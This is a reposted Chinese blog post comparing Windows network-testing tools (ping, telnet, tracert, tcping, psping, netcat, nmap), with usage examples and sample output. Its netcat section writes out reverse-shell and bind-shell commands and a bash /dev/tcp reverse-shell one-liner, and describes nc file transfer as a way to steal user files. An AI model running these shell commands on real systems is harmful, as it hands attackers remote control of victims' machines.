windows下网络测试工具
下面列舉下網工會用到的一些網絡測試工具,分別為ping、telnet、tracert、tcping、psping、nc(支持UDP)、nmap我會分別列舉其優缺點,來歷,這也是我常用的。
1.ping
ping 命令以前是一個很好用并且常用的網絡測試工具,它是基于 ICMP 協議,但是出于網絡安全等因素,大部分網絡環境以及云環境可能都會禁止 ICMP 協議,所以在工作中,我們必須掌握一些其他比較流行的網絡測試工具。
優點:系統自帶,可以直接用
缺點:只能測試網絡層面的連通性,無法測試 tcp/udp端口連通性
用法示例:ping -S 192.168.0.106 -n 100 -l 3000 192.168.0.1(源地址、ping次數、包長度)-t是一直ping
2.telnet
Telnet協議是TCP/IP協議族中的一員,是Internet遠程登陸服務的標準協議和主要方式。有時我們也用該命令來檢測主機到目標主機之間的端口連通情況。
優點:系統自帶,不過需要在windows組件那安裝一下。
缺點:由于telnet是基于tcp的,所以無法測試udp端口,而且單次只能測試一個,而且如果測試某端口時,如果端口通,會跳轉到新的黑窗口,無法退出去開始另一個測試;如果端口不通,會一直顯示正在連接,挺長一段時間才會顯示連接失敗,非常影響測試多個端口或主機的效率。
用法示例:telnet 192.168.0.1 80
3.tracert
Traceroute是用來偵測顯示主機到目標主機之間所經路由的IP地址,通過traceroute我們可以知道信息從你的主機到目標主機是走的什么路徑,是一種便利的常用的工具。在windows系統下為:tracert
優點:網絡層面的跟蹤路徑,不帶任何參數,回將IP地址做dns查詢,查詢出主機名,速度較慢,一般加個-d,,不解析為主機名.
用法示例:tracert -d 192.168.0.1
Tcproute也是探測路徑的,不太好用,有空可以再測試,主要是慢
tcproute -i 4 192.168.0.1 默認是80端口,-i 4 是指定接口,你要選擇要用的那個網卡
4.tcping
tcping用于TCP端口的連通性測試,可以看到端口是否打開,還有具體延遲。默認端口為80,如果是其他地址在IP地址后空格,然后輸入端口號即可。
優點:和ping一樣好用,端口不通,2s超時,就能看到結果。
缺點:只能測試TCP端口
下載鏈接:https://elifulkerson.com/projects/tcping.php
C:\Users\xueyu>tcping 192.168.0.1
Probing 192.168.0.1:80/tcp - Port is open - time=13.913ms
Probing 192.168.0.1:80/tcp - Port is open - time=2.166ms
Probing 192.168.0.1:80/tcp - Port is open - time=2.253ms
Probing 192.168.0.1:80/tcp - Port is open - time=1.911ms
5.psping
PsPing是微軟PSTools工具套件中的其中一個命令。除了ICMP ping測試,它主要用來測試TCP端口的連通性,還可以測試TCP/UDP網絡時延和帶寬。不過,PsPing只能在 Windows 中運行。如果您需要在 Linux 中發起 TCP 端口連通性和網路時延的測試,可以使用PaPing 。PaPing 是一個跨平臺的開源工具。它的功能相對PsPing而言更簡單,只支持 TCP 端口的相關測試,不支持UDP端口的測試。
工具下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psping
下載完PSTools.zip包之后,放到任意本地磁盤內,解壓之后,將 psping.exe拷貝到 C:\Windows\System32 下,那么你在 cmd 命令窗口的任意目錄都可以使用 PsPing 命令了。當然你也可以單獨將 psping.exe 命令解壓出來放在任意路徑,然后從命令提示符來運行。只是這樣就需要在運行命令前轉換到 psping.exe 所在的路徑。
主要介紹微軟的測試工具Psping,該工具功能主要包括:ICMP Ping、TCP Ping、延遲測試、帶寬測試。
需要說明一種應用場景:由于Windows Azure數據中心禁ICMP,使用Psping的TCP Ping的功能來測試聯通性或者故障排查就非常有用了。
優點:ICMP Ping、TCP Ping、延遲測試、帶寬測試。這幾個功能都包括了.
缺點:? 只能測試TCP端口,UDP用于帶寬測試
用法示例:TCP ping測試
C:\Users\xueyu>psping 192.168.0.1:80
PsPing v2.10 - PsPing - ping, latency, bandwidth measurement utility
Copyright (C) 2012-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
TCP connect to 192.168.0.1:80:
5 iterations (warmup 1) ping test:
Connecting to 192.168.0.1:80 (warmup): from 192.168.0.106:14839: 1.87ms
Connecting to 192.168.0.1:80: from 192.168.0.106:14840: 2.03ms
Connecting to 192.168.0.1:80: from 192.168.0.106:14841: 2.09ms
Connecting to 192.168.0.1:80: from 192.168.0.106:14842: 4.10ms
Connecting to 192.168.0.1:80: from 192.168.0.106:14844: 3.19ms
TCP connect statistics for 192.168.0.1:80:
? Sent = 4, Received = 4, Lost = 0 (0% loss),
? Minimum = 2.03ms, Maximum = 4.10ms, Average = 2.85ms
帶寬測試(UDP,默認TCP,2000包長,100個包)
C:\Users\xueyu>psping -b -u -l 2000 -n 100 218.241.164.5:8443
PsPing v2.10 - PsPing - ping, latency, bandwidth measurement utility
Copyright (C) 2012-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Setting warmup count to match number of outstanding I/Os: 8
UDP bandwidth test connecting to 218.241.164.5:8443: Connected
108 iterations (8 warmup) sending 2000 bytes UDP bandwidth test: -152627100%
UDP sender bandwidth statistics:
? Sent = 100, Size = 2000, Total Bytes: 214000,
? Minimum = 4.35 MB/s, Maximum = 4.35 MB/s, Average = 4.35 MB/s
Error exchanging UDP statistics: 你的主機中的軟件中止了一個已建立的連接。
6.nc
nc是netcat的簡寫,有網絡界的瑞士×××的美譽。因為它短小精悍、功能實用,被設計為一個簡單、可靠的網絡工具。
使用場景:NC為我們提供了四大功能(作為server發起端口偵聽、作為client掃描端口、傳輸文件、測試網速),響應速度快。
優點:響應速度快,而且支持UDP,可以用來傳文件,不過這個我沒用過
缺點:只能看到端口是否通,無法看到具體延遲
使用方法:nc -vnz 地址 端口?? (-v :顯示詳細信息(那一行輸出)、-n:不做dns查詢、-z:零I/O,只做探測、-u:支持UDP)
C:\Users\xueyu>nc -vnz 218.241.164.5 8443
(UNKNOWN) [218.241.164.5] 8443 (?) open
C:\Users\xueyu>nc -vunz 218.241.206.66 1234
(UNKNOWN) [218.241.206.66] 1234 (?) open
其他功能
常用功能總結:
a)? nc dst_hostname dst_port:nc實現連接到dst_host對應的dst_port上。在連接成功后,可以正常的輸入一些該端口綁定服務所識別的命令。
GET /HTTP/1.0
b) nc –l –p src_port:src_port開啟偵聽模式,等待連接。
nc –l –vp src_port < input_filename inputfilename與src_port綁定
nc dst_hostname dst_port > output_filename dst_port與outputfilename綁定
最終可以實現從input_filename轉移到output_filename,這個過程可以幫助***偷走用戶的一些關鍵資料。
這2個方向可以倒置,實現的功能就完全相仿了,***可以往用戶目錄傳輸一些文件。
c) shell反彈
受害者V: nc dst_host dst_port –e? [cmd.exe|bin/bash|bin/zsh ]
***者A: nc –lvp src_port
***者開啟監聽模式,受害者綁定shell反彈給***者
d) shell正向連接
受害者V:?? nc -lvp src_port??? –e [cmd.exe|bin/bash|bin/zsh]
***者A: nc dst_host dst_port
e) 受害者機器上沒有netcat,仍然可以做到反彈:
***者A:nc –l –p src_port
受害者V:bash -i >& /dev/tcp/dst_host/dst_port0>&1
更多介紹:
https://www.cnblogs.com/chengd/p/7565280.html
7.nmap
全稱Network Mapper,是Linux下的網絡掃描和嗅探工具包,也稱之為“系統漏洞掃描之王”。
使用場景:nmap提供了一些基本功能,比如主機發現、端口掃描、服務掃描、系統掃描等,它不僅可以測試端口連通性,還可以獲取地址的服務類型、狀態、端口及協議等信息。
優點:能看出來該端口下是啥協議,貌似功能挺多的。ncat 是nmap的一個組件 ncat是nc的加強版,基本命令都支持
缺點: 速度慢
C:\Users\xueyu>nmap -p 218.241.206.66 -8443
nmap: illegal option -- 8
See the output of nmap -h for a summary of options.
C:\Users\xueyu>nmap -p 8443 218.241.206.66
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-05 19:07 ?D1ú±ê×?ê±??
Nmap scan report for 218.241.206.66
Host is up (0.11s latency).
PORT???? STATE SERVICE
8443/tcp open? https-alt
Nmap done: 1 IP address (1 host up) scanned in 36.42 seconds
中文參考手冊
http://www.nmap.com.cn/doc/manual.shtm
ncat?? 連接UDP端口
C:\Users\xueyu>ncat -vuzn 218.241.164.5 8443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 218.241.164.5:8443.
Ncat: UDP packet sent successfully
Ncat: 1 bytes sent, 0 bytes received in 2.14 seconds
例子: 1) 配置為服務器段,監聽端口
通過過?-l?選項,ncat?可以進入監聽模式,使我們可以在指定端口監聽入站連接。 完整的命令是這樣的:
$?ncat?-l?port_number比如,
$?ncat?-l?8080服務器就會開始在 8080 端口監聽入站連接。
例子: 2) 連接遠程系統
使用下面命令可以用?nc?來連接遠程系統,
$?ncat?IP_address?port_number讓我們來看個例子,
$?ncat?192.168.1.100?80這會創建一個連接,連接到 IP 為 192.168.1.100 的服務器上的 80 端口,然后我們就可以向服務器發送指令了。 比如我們可以輸入下面內容來獲取完整的網頁內容
GET?/?HTTP/1.1Linux下使用nping測試TCP\UDP延遲
https://bugxia.com/238.html
參考資料:
http://blog.sina.com.cn/s/blog_5ceb51480102xwp2.html
你還在ping嗎?7種進階方法讓你快速測試端口連通性
http://network.51cto.com/art/201903/594117.htm ? ?
https://www.cnblogs.com/jonnyan/p/9662791.html
NetCat簡介
https://blog.csdn.net/phone15062117684/article/details/79039735
Netcat詳解
https://blog.csdn.net/fageweiketang/article/details/82833193
ncat 幾個常用例子
https://blog.csdn.net/u014389734/article/details/79040489
轉載于:https://blog.51cto.com/xueyue8/2374494
總結
以上是生活随笔為你收集整理的windows下网络测试工具的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: matlab函数sim,MATLAB 中
- 下一篇: 解决模拟人生3(SIM 3)闪退问题